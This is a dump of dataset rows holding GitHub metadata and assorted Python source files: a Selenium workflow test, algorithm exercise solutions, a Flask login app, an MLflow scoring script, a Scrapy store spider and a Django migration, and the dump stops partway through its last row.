blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe1d3e30f4cdfd8651a3f9176b4620a6452e5d01
|
4a9995871447a406a7e6307a030503700cd41226
|
/script/testCase/Y3me项目/人力资源/薪资核算/审批流_定调薪.py
|
6a0c29d1fa8b09c17d7ae30c81a1f876d8ab676d
|
[] |
no_license
|
juntaoh1234/12122003
|
96a107ce22d930e8d9517810736d8f6ce92dc7ad
|
4bee39286c3708d7a0df3001e0daa9da51478170
|
refs/heads/master
| 2020-10-01T18:20:01.572599
| 2019-12-12T12:04:08
| 2019-12-12T12:04:08
| 227,596,967
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,960
|
py
|
# -*-CodeIng:utf-8 -*-
# @time :2019/10/31 20:02
# @author:HuangJunTao
# @email:1341890679@qq.com
# @file:审批流_薪资.py
# @SoftWare:PyCharm
from time import sleep
from SRC.common.decorator import codeException_dec
from SRC.unittest.case import TestCase
from SRC.webdriver.switchTo import SwitchTo
from script.common import utils
from selenium.webdriver import ActionChains
class EasyCase(TestCase):
str_regular = None
def __init__(self, webDriver, paramsList):
# 请不要修改该方法124421
super(EasyCase, self).__init__(webDriver, paramsList)
@codeException_dec('3')
def runTest(self):
driver = self.getDriver()
driver.implicitly_wait(30)
param = self.param
tool = utils
driver.refresh()
# driver.find_element_by_xpath('//*[@id="_dropdown_popcontainer"]/div/i').click()
# driver.find_element_by_xpath('//*[@id="home_header"]//div[text()="UI测试专属"]').click()
# driver.find_element_by_xpath(
# '//button[@class="u-button btn__style___37bsb u8c_primary__style___RFibc btn__style___20DQM "]').click()
# sleep(2)
# 左上方公共节点
driver.find_element_by_class_name('lebra-navbar-left-icon').click()
sleep(2)
# #进入社交协同
# driver.find_element_by_xpath('//*[text()="数字化建模"]').click()
# sleep(2)
# 进入一级节点
menu2 = driver.find_element_by_css_selector('span[title="流程管理"]')
actions = ActionChains(driver)
actions.move_to_element(menu2)
actions.click(menu2)
actions.perform()
sleep(1)
# 进入二级节点
driver.find_element_by_xpath('//li[@title="模型管理"]').click()
sleep(1)
# 跳转模型管理iframe
iframe = driver.find_element_by_id('XTLCZX0006')
# driver.switch_to.frame(iframe)
SwitchTo(driver).frame(iframe)
sleep(1)
# 点击左侧树按钮
driver.find_element_by_xpath('//*[@id="app"]//span[text()="人力资源"]').click()
sleep(1)
# 点击左侧树按钮
driver.find_element_by_xpath('//*[@id="app"]//span[text()="薪资核算"]').click()
sleep(1)
wins0 = driver.window_handles
# 选中请假
driver.find_element_by_xpath('//*[@id="app"]//span[text()="定调薪"]').click()
# 点击新增按钮
driver.find_element_by_xpath('//div[@class="btns-wrapper"]//button[1]').click()
sleep(2)
# 输入流程名称
driver.find_element_by_xpath('//label[text()="名称"]/following-sibling::div//input').send_keys('定调薪流程')
# 备注信息
driver.find_element_by_xpath('//textarea').send_keys("备注信息0002")
# 点击确定按钮
driver.find_element_by_xpath(
'//span[text()="新增流程模型"]/ancestor::div[@class="el-dialog__wrapper"]//button[2]').click()
sleep(1)
# 断言
self.assertEqual("创建成功", driver.find_element_by_xpath('//p[text()="创建成功"]').text)
# 点击设计按钮
driver.find_element_by_xpath(
'//*[@id="app"]//table[@class="el-table__body"]/tbody/tr/td[4]/div/span[2]').click()
# 跳转新页面
wins = driver.window_handles
driver.switch_to_window(wins[-1])
sleep(2)
# 双击主管审批
# driver.find_element_by_xpath('//*[@id="app"]/div/div/div/div[1]/div[2]/button[2]').click()
# driver.find_element_by_xpath('//span[@title="主管审批"]').doubleClick()
driver.find_element_by_xpath('//div[@id="designer"]//div/span[1]/span').doubleClick()
sleep(2)
# 输入节点名称
driver.find_element_by_xpath('//input[@placeholder="请输入流程环节名称"]').send_keys("提交")
# 移动滚动条
action = ActionChains(driver)
ele = driver.find_element_by_xpath(
'//*[@id="app"]/div/div/div/div[4]/div/div/div[2]/div[2]/div[1]/div/div[4]/div')
action.drag_and_drop_by_offset(ele, 1, 110)
action.perform()
sleep(1)
# 点击审批流的发起人
driver.find_element_by_xpath(
'//*[@id="app"]/div/div/div/div[4]/div/div/div[2]/div[2]/div[1]/div/div[2]/div[2]/div[2]/label[1]/span[2]').click()
# 点击保存
driver.find_element_by_xpath('//button[@class="yy-btn yy-btn-primary"]').click()
# 点击保存并发布
driver.find_element_by_xpath('//button[@class="right-run yy-btn yy-btn-primary"]').click()
driver.close()
# 跳转回原来的页面
win1 = driver.window_handles
driver.switch_to_window(win1[0])
# 关闭当前页面
sleep(2)
driver.switch_to.default_content()
sleep(1)
driver.find_element_by_xpath('//*[@id="home_header"]/div/div[3]/ul/li/div').click()
|
[
"1341890679@qq.com"
] |
1341890679@qq.com
|
17a92b1f3e8481c39a88bfcce5206a41d042f85e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03003/s061738428.py
|
e296bd1653a5eb16609ce574bdaa3369516bc4d2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,199
|
py
|
#ABC130-E Common Subsequence
"""
問題:
整数列のリストが与えられる
空であるものも含めて、sとtの部分列として等しいものの個数を求めよ
解法:
LCSのmaxではなくsumのバージョンでかつ、
数え上げなので重複をなくさなければならない。
具体的には、
dp[i][j]:sをi文字目迄見た時のtをj文字目迄見た時に、
dp0:横方向(j方向)を優先して遷移した後に、縦方向(i方向)への遷移を行った時の合計
dp1:縦方向、横方向への遷移を行った時の合計
として、dp1[-1][-1]が答え。
"""
import sys
readline = sys.stdin.buffer.readline
def even(n): return 1 if n%2==0 else 0
n,m = map(int,readline().split())
s = list(map(int,readline().split())) + [-1]
t = list(map(int,readline().split())) + [-2]
mod = 10**9+7
#dp table
dp0 = [[0]*(m+2) for _ in range(n+2)]
dp1 = [[0]*(m+2) for _ in range(n+2)]
dp0[0][0] = 1
#process1
for i in range(n+1):
for j in range(m+1):
dp0[i+1][j] += dp0[i][j]%mod
dp1[i][j] += dp0[i][j]%mod
dp1[i][j+1] += dp1[i][j]%mod
if s[i] == t[j]:
dp0[i+1][j+1] += dp1[i][j]%mod
print(dp1[n][m]%mod)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d6c44a3ffa12b15844a15eec93e1fb8552b1bdaa
|
c09decad4cb64b151913c25192eaa13348f63833
|
/228_middle_of_linked_list.py
|
a6d7fca7e7cbd173247de187ff3f6bccce225a7d
|
[] |
no_license
|
YI-DING/Lintcode
|
ef890e53282b9668064a7306329ecd0599dd114b
|
89a4cf703eb7a79bd62b6cc41f87242489692b88
|
refs/heads/master
| 2020-06-17T12:57:44.184391
| 2019-07-19T16:31:32
| 2019-07-19T16:31:32
| 195,931,377
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
"""
Definition of ListNode
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
"""
class Solution:
"""
@param head: the head of linked list.
@return: a middle node of the linked list
"""
def middleNode(self, head):
if not head:
return None
slow = fast = ListNode(0)
slow.next = head
while fast:
if not fast.next:
break
slow = slow.next
fast = fast.next.next
return slow
|
[
"yiding1@uchicago.edu"
] |
yiding1@uchicago.edu
|
500fc4e6c97a72dc6703594efe00e2d77f4fdff6
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_201/1935.py
|
793ff52e55241fc12bc0b977c6c0e8c244a5f7aa
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
from itertools import groupby
import math
"""
I KNOW ITS SLOW BUT I WANTED TO TRY THIS SOLUTION ANYWAY
"""
FREE = False
OCCUPIED = True
def get_stall_value(stalls, stall_index):
left_free_space = right_free_space = 0
tmp_index = stall_index
while True:
tmp_index -= 1
if stalls[tmp_index] == OCCUPIED:
break
left_free_space += 1
tmp_index = stall_index
while True:
tmp_index += 1
if stalls[tmp_index] == OCCUPIED:
break
right_free_space += 1
return left_free_space, right_free_space
def go_into_next_stall(stalls):
final_index = 0
grouped = groupby(stalls)
max_len = 0
for key, group in groupby(stalls):
if key == FREE:
max_len = max(max_len, len(list(group)))
for key, group in grouped:
group = list(group)
group_len = len(group)
if key == OCCUPIED or group_len != max_len:
final_index += group_len
else:
final_index += int((group_len - 1) / 2)
l_val, r_val = math.ceil((group_len - 1) / 2), math.floor((group_len - 1) / 2)
break
stalls[final_index] = OCCUPIED
return l_val, r_val
def get_values(nbr_stalls, nbr_people):
stalls = [FREE] * nbr_stalls
stalls = [OCCUPIED] + stalls + [OCCUPIED]
for people in range(nbr_people):
l_val, r_val = go_into_next_stall(stalls)
return l_val, r_val
def main():
nbr_rows = int(input())
for nbr_row in range(1, nbr_rows + 1):
nbr_stalls, nbr_people = map(int, input().split())
l_val, r_val = get_values(nbr_stalls, nbr_people)
print("Case #{nbr_rows}: {l_val} {r_val}".format(
nbr_rows=nbr_row, l_val=l_val, r_val=r_val))
if __name__ == "__main__":
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
aa358d4290d3d085e65216cf41db3ad6bfd413da
|
3888104cebd79de74f33dda628505b491e32be09
|
/lcs4.py
|
f5845eba44ced2722b53996fef018e3d81623f78
|
[] |
no_license
|
babiswas/Dynamic-Programming
|
788f7c35aa927228a728da6025657554487285f5
|
957e150577fd5bbccde33cb393c78dcad07860c1
|
refs/heads/master
| 2022-12-24T05:24:03.282098
| 2020-09-27T14:55:05
| 2020-09-27T14:55:05
| 299,054,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
def lcs(str1,str2,m,n,T):
for i in range(m+1):
for j in range(n+1):
if i==0 or j==0:
T[i][j]=0
for i in range(1,m+1):
for j in range(1,n+1):
if str1[i-1]==str2[j-1]:
T[i][j]=1+T[i-1][j-1]
elif str1[i-1]!=str2[j-1]:
T[i][j]=max(T[i-1][j],T[i][j-1])
return T[m][n]
def lcs_util(str1,str2,m,n):
T=[[-1 for i in range(n+1)] for j in range(m+1)]
return lcs(str1,str2,m,n,T)
if __name__=="__main__":
print(lcs_util("abcdgh","abedfhr",len("abcdgh"),len("abedfhr")))
|
[
"noreply@github.com"
] |
babiswas.noreply@github.com
|
67f9eb131a4fe209142b2e9cde4c78e0d5898318
|
f0cddf6fb1b58f4e80e169eda4897a3ab864cd48
|
/login/app.py
|
aee1a989b6b7a52299d82633094ed169ca07511c
|
[] |
no_license
|
skrstv123/LEARNING-FLASK
|
8a3134bf2198051601a2ff8f92df8cd2a2ed7b90
|
2d3912fd251b763deb5f7f7468d9a5e79bf7ef4f
|
refs/heads/master
| 2022-12-10T19:06:28.623200
| 2020-01-19T20:08:28
| 2020-01-19T20:08:28
| 229,042,034
| 0
| 0
| null | 2022-12-08T03:27:21
| 2019-12-19T11:38:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,279
|
py
|
from myproject import app,db
from flask import render_template, redirect, request, url_for, flash,abort
from flask_login import login_user,login_required,logout_user
from myproject.models import User
from myproject.forms import LoginForm, RegistrationForm
from werkzeug.security import generate_password_hash, check_password_hash
@app.route('/')
def home():
return render_template('home.html')
@app.route('/welcome')
@login_required
def welcome_user():
return render_template('welcome_user.html')
@app.route('/logout')
@login_required
def logout():
logout_user()
flash('You logged out!')
return redirect(url_for('home'))
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
# Grab the user from our User Models table
user = User.query.filter_by(email=form.email.data).first()
# Check that the user was supplied and the password is right
# The verify_password method comes from the User object
# https://stackoverflow.com/questions/2209755/python-operation-vs-is-not
if user is not None and user.check_password(form.password.data):
#Log in the user
login_user(user)
flash('Logged in successfully.')
# If a user was trying to visit a page that requires a login
# flask saves that URL as 'next'.
next = request.args.get('next')
# So let's now check if that next exists, otherwise we'll go to
# the welcome page.
if next == None or not next[0]=='/':
next = url_for('welcome_user')
return redirect(next)
return render_template('login.html', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
flash('Thanks for registering! Now you can login!')
return redirect(url_for('login'))
return render_template('register.html', form=form)
if __name__ == '__main__':
app.run(debug=True)
|
[
"skrstv123@gmail.com"
] |
skrstv123@gmail.com
|
0ae899d23ae015fa404ce12fddaeb90360443dcc
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_374/ch26_2020_03_23_11_49_24_338094.py
|
cc35e8b2f881012697174064d14183bc52630ce9
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
val = int(input("Digite o valor da casa "))
sal = int(input("Digite o valor do seu salário"))
ano = int(input("Digite o tempo em anos que pretende pagar "))
calculo = (val/ano)
if calculo <= 0.3*sal:
print("Empréstimo não aprovado")
else:
print("Empréstimo aprovado")
|
[
"you@example.com"
] |
you@example.com
|
d194acc581ca1a2dabbfb09e565826189cda4fbc
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/tensorflow 2/python/ops/array_ops.py
|
752790e486e2c8177d53c2e0e801774b2ff01fb4
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755
| 2021-07-05T14:09:15
| 2021-07-05T14:09:15
| 382,864,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:c3fab6161a6ca581784be67954e7b9c2792e559bfc3a79286f79410909df8ec9
size 225087
|
[
"business030301@gmail.com"
] |
business030301@gmail.com
|
0eec7a8cf3a3e4a155feae3b08a5c930173d74bf
|
9452f681ea486fc53ad88d05392aed5fc450805c
|
/data_language_all/python/python_420.txt
|
f69fb14b5ec0f087ef9410f16cbb9d2d0193f595
|
[] |
no_license
|
CoryCollins/src-class
|
11a6df24f4bd150f6db96ad848d7bfcac152a695
|
f08a2dd917f740e05864f51ff4b994c368377f97
|
refs/heads/master
| 2023-08-17T11:53:28.754781
| 2021-09-27T21:13:23
| 2021-09-27T21:13:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
txt
|
#!/usr/bin/env python
__all__ = ['baomihua_download', 'baomihua_download_by_id']
from ..common import *
import urllib
def baomihua_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False, **kwargs):
html = get_html('http://play.baomihua.com/getvideourl.aspx?flvid=%s&devicetype=phone_app' % id)
host = r1(r'host=([^&]*)', html)
assert host
type = r1(r'videofiletype=([^&]*)', html)
assert type
vid = r1(r'&stream_name=([^&]*)', html)
assert vid
dir_str = r1(r'&dir=([^&]*)', html).strip()
url = "http://%s/%s/%s.%s" % (host, dir_str, vid, type)
_, ext, size = url_info(url)
print_info(site_info, title, type, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge = merge)
def baomihua_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
html = get_html(url)
title = r1(r'<title>(.*)</title>', html)
assert title
id = r1(r'flvid\s*=\s*(\d+)', html)
assert id
baomihua_download_by_id(id, title, output_dir=output_dir, merge=merge, info_only=info_only)
site_info = "baomihua.com"
download = baomihua_download
download_playlist = playlist_not_supported('baomihua')
|
[
"znsoft@163.com"
] |
znsoft@163.com
|
2db97a28852186e87dec880bb875aaf5529e8812
|
500bca3e22bd0c30c79b74918e9847742b3c428e
|
/sdk/python/jobs/pipelines/1j_pipeline_with_pipeline_component/nyc_taxi_data_regression_with_pipeline_component/train_pipeline/predict_src/predict.py
|
fde23606901aec040fa25345734e835f96c02c9f
|
[
"MIT"
] |
permissive
|
Azure/azureml-examples
|
2304c862fd2e36e6640ecc4d09f69c5ed93b48ab
|
e5f7b247d4753f115a8f7da30cbe25294f71f9d7
|
refs/heads/main
| 2023-08-31T00:10:14.107509
| 2023-08-30T17:29:22
| 2023-08-30T17:29:22
| 289,334,021
| 1,219
| 1,074
|
MIT
| 2023-09-14T16:00:55
| 2020-08-21T18:04:26
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,022
|
py
|
import argparse
import pandas as pd
import os
from pathlib import Path
from sklearn.linear_model import LinearRegression
import mlflow
mlflow.sklearn.autolog()
parser = argparse.ArgumentParser("predict")
parser.add_argument("--model_input", type=str, help="Path of input model")
parser.add_argument("--test_data", type=str, help="Path to test data")
parser.add_argument("--predictions", type=str, help="Path of predictions")
args = parser.parse_args()
print("hello scoring world...")
lines = [
f"Model path: {args.model_input}",
f"Test data path: {args.test_data}",
f"Predictions path: {args.predictions}",
]
for line in lines:
print(line)
# Load and split the test data
print("mounted_path files: ")
arr = os.listdir(args.test_data)
print(arr)
test_data = pd.read_csv(Path(args.test_data) / "test_data.csv")
testy = test_data["cost"]
# testX = test_data.drop(['cost'], axis=1)
testX = test_data[
[
"distance",
"dropoff_latitude",
"dropoff_longitude",
"passengers",
"pickup_latitude",
"pickup_longitude",
"store_forward",
"vendor",
"pickup_weekday",
"pickup_month",
"pickup_monthday",
"pickup_hour",
"pickup_minute",
"pickup_second",
"dropoff_weekday",
"dropoff_month",
"dropoff_monthday",
"dropoff_hour",
"dropoff_minute",
"dropoff_second",
]
]
print(testX.shape)
print(testX.columns)
# Load the model from input port
model = mlflow.sklearn.load_model(args.model_input)
# Make predictions on testX data and record them in a column named predicted_cost
predictions = model.predict(testX)
testX["predicted_cost"] = predictions
print(testX.shape)
# Compare predictions to actuals (testy)
output_data = pd.DataFrame(testX)
output_data["actual_cost"] = testy
# Save the output data with feature columns, predicted cost, and actual cost in csv file
output_data = output_data.to_csv((Path(args.predictions) / "predictions.csv"))
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
a6b07925ad745b8be7937bfeb0c1c2786ded3dab
|
e87d793b3a5facc6e54e0263fbd67703e1fbb382
|
/duckietown-world-venv/lib/python3.6/site-packages/compmake/utils/system_stats.py
|
b91659969d09931f398a5f0c7b510618abb69b60
|
[] |
no_license
|
llingg/behaviour-benchmarking
|
a860bbe709309e13f3e1133d916944882199a40f
|
85bbf1a9c2c628ba74480fe7abac3804d6afdac4
|
refs/heads/v1
| 2022-10-06T08:21:29.068329
| 2020-06-11T07:02:46
| 2020-06-11T07:02:46
| 259,622,704
| 0
| 0
| null | 2020-06-02T17:52:46
| 2020-04-28T11:52:08
|
C++
|
UTF-8
|
Python
| false
| false
| 3,677
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
__all__ = [
'AvgSystemStats',
]
try:
import psutil # @UnusedImport
except ImportError:
from compmake import logger
logger.warning('Package "psutil" not found; load balancing '
'and system stats (CPU, MEM) not available.')
class AvgSystemStats(object):
""" Collects average statistics about the system using psutil. """
def __init__(self, interval, history_len):
"""
:param interval: Collect statistics according to this interval.
:param history_len: Use this many to compute avg/max statistics.
"""
self.interval = interval
self.history_len = history_len
try:
import psutil # @UnresolvedImport @Reimport
except:
self._available = False
else:
self._available = True
self.cpu = Collect('cpu', lambda: psutil.cpu_percent(interval=0),
interval, history_len)
try:
# new in 0.8
psutil.virtual_memory().percent
get_mem = lambda: psutil.virtual_memory().percent
except:
get_mem = lambda: psutil.phymem_usage().percent
self.mem = Collect('mem', get_mem, interval, history_len)
try:
# new in 0.8
psutil.swap_memory().percent
get_mem = lambda: psutil.swap_memory().percent
except:
get_mem = lambda: psutil.virtmem_usage().percent
self.swap_mem = Collect('swap', get_mem, interval, history_len)
def avg_cpu_percent(self):
self._check_available()
return self.cpu.get_avg()
def max_cpu_percent(self):
self._check_available()
return self.cpu.get_max()
def avg_phymem_usage_percent(self):
self._check_available()
return self.mem.get_avg()
def cur_phymem_usage_percent(self):
self._check_available()
return self.mem.get_cur()
def cur_virtmem_usage_percent(self):
self._check_available()
return self.swap_mem.get_cur()
def available(self):
""" returns false if psutil is not installed """
return self._available
def _check_available(self):
if not self._available:
msg = 'Sorry, psutil not available.'
raise ValueError(msg)
class Collect(object):
def __init__(self, name, function, interval, history_len):
self.name = name
self.function = function
self.interval = interval
self.history_len = history_len
self.last_time = None
self.values = []
def get_cur(self):
""" Returns the last value. """
self.update_if_necessary()
return self.values[-1]
def get_min(self):
self.update_if_necessary()
return min(self.values)
def get_max(self):
self.update_if_necessary()
return max(self.values)
def get_avg(self):
self.update_if_necessary()
return sum(self.values) * 1.0 / len(self.values)
def update_if_necessary(self):
if self.values and self.time_from_last() < self.interval:
return
self.values.append(self.function())
self.last_time = time.time()
if len(self.values) > self.history_len:
self.values.pop(0)
# print('%s: %s' % (self.name, self.values))
def time_from_last(self):
if self.last_time is None:
return self.interval * self.history_len * 2
else:
return time.time() - self.last_time
|
[
"linggl@student.ethz.ch"
] |
linggl@student.ethz.ch
|
02d1bcf15ae7ebbed8bbbdb8e3525273dfec8001
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/mediamarkt_be.py
|
237c2ef3f09038fd1a8b6bec4254303932a2be83
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from locations.hours import DAYS_FR, OpeningHours
from locations.structured_data_spider import StructuredDataSpider
class MediaMarktBESpider(CrawlSpider, StructuredDataSpider):
name = "media_markt_be"
item_attributes = {"brand": "MediaMarkt", "brand_wikidata": "Q2381223"}
start_urls = ["https://www.mediamarkt.be/fr/marketselection.html"]
rules = [Rule(LinkExtractor(restrict_css=".all-markets-list"), callback="parse_sd")]
def post_process_item(self, item, response, ld_data, **kwargs):
name = response.xpath('//*[@id="my-market-content"]/h1/text()').get()
if name:
item["name"] = name
opening_hours = self.parse_hours(ld_data)
if opening_hours:
item["opening_hours"] = opening_hours
yield item
@staticmethod
def parse_hours(ld_data: dict):
opening_hours = OpeningHours()
regex = re.compile(r"(lu|ma|me|je|ve|sa|su)\s+(\d{2}:\d{2})\s*-(\d{2}:\d{2})")
for hours_str in ld_data["openingHours"]:
match = re.search(regex, hours_str)
if match:
day_of_week = match.group(1).capitalize()
open_time = match.group(2)
close_time = match.group(3)
opening_hours.add_range(day=DAYS_FR[day_of_week], open_time=open_time, close_time=close_time)
return opening_hours
|
[
"noreply@github.com"
] |
alltheplaces.noreply@github.com
|
d2a116fd1e388ccc8ebd0e3a4c78b63d1b0b2041
|
cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45
|
/Personal/Cmmercial/products/migrations/0001_initial.py
|
3f1b13821e51314afd7b2052f0cec407866a824f
|
[] |
no_license
|
ProsenjitKumar/PycharmProjects
|
d90d0e7c2f4adc84e861c12a3fcb9174f15cde17
|
285692394581441ce7b706afa3b7af9e995f1c55
|
refs/heads/master
| 2022-12-13T01:09:55.408985
| 2019-05-08T02:21:47
| 2019-05-08T02:21:47
| 181,052,978
| 1
| 1
| null | 2022-12-08T02:31:17
| 2019-04-12T17:21:59
| null |
UTF-8
|
Python
| false
| false
| 1,216
|
py
|
# Generated by Django 2.1.3 on 2018-11-21 08:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, upload_to='product_photo/')),
('description', models.TextField()),
('price', models.IntegerField()),
],
),
migrations.CreateModel(
name='ProductCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
],
),
migrations.AddField(
model_name='product',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ProductCategory'),
),
]
|
[
"prosenjitearnkuar@gmail.com"
] |
prosenjitearnkuar@gmail.com
|
e3554e38fb6ff22a2f5045724ea53f7595a4c7e5
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/number-of-unequal-triplets-in-array.py
|
b5c5df654ed10cc8343e709f7badcabd6c662a00
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Time: O(n * k) = O(3 * n)
# Space: O(n + k) = O(n)
import collections
# freq table, dp
class Solution(object):
def unequalTriplets(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
K = 3
cnt = collections.Counter()
dp = [0]*K # dp[i]: number of unequal (i+1)-plets
for x in nums:
cnt[x] += 1
other_cnt = 1
for i in xrange(K):
dp[i] += other_cnt
other_cnt = dp[i]-cnt[x]*other_cnt
return dp[K-1]
|
[
"noreply@github.com"
] |
kamyu104.noreply@github.com
|
333b9acb1c421772b36728887c628c06910f5ea9
|
47deebe6fefedb01fdce5d4e82f58bb08f8e1e92
|
/python core/Lesson_9/list_15.py
|
3c9f1848f5a41869c089d25a9f31a5453ed7030e
|
[] |
no_license
|
developeryuldashev/python-core
|
5bb162603bdb5782acf05e3fb25ca5dd6347067a
|
08fca77c9cfde69d93a7875b3fb65b98f3dabd78
|
refs/heads/main
| 2023-08-21T03:33:12.160133
| 2021-10-19T04:56:53
| 2021-10-19T04:56:53
| 393,383,696
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
a=[1,2,3,4,5,6,3,4,5,8,9]
b=[]
c=[]
n=len(a)
i=n
while i>0:
b.append(a[i-1])
c.append(a[i-2])
i-=2
print(b)
print(c)
|
[
"81365808+developeryuldashev@users.noreply.github.com"
] |
81365808+developeryuldashev@users.noreply.github.com
|
300add98b274304dbcde91ccbb0f8fb7c2bda876
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/pandas/tests/series/test_internals.py
|
0febda9b710f4d9388ea3bf53da20bcf4f5af3c0
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:cef8d1aa7b5483d0f8576d8863c0fa66a3fd81948992238d8d5f1a5531cee05a
size 8984
|
[
"github@cuba12345"
] |
github@cuba12345
|
14dc45b7b1ffbddfdfb9e556d2237d15b7495403
|
14d940630ab365be939fc08d3d95b0a98789bae7
|
/lab32_list_comprehension_parte1.py
|
ab0e3c4e44cd1d99e38f7d80a38a5e3f85b41e0a
|
[] |
no_license
|
accolombini/python_completo
|
1da6f58f0c57b978d70582d96dc12b80c2d5b8a8
|
935102173a1112273b09734392dca08d76e9c749
|
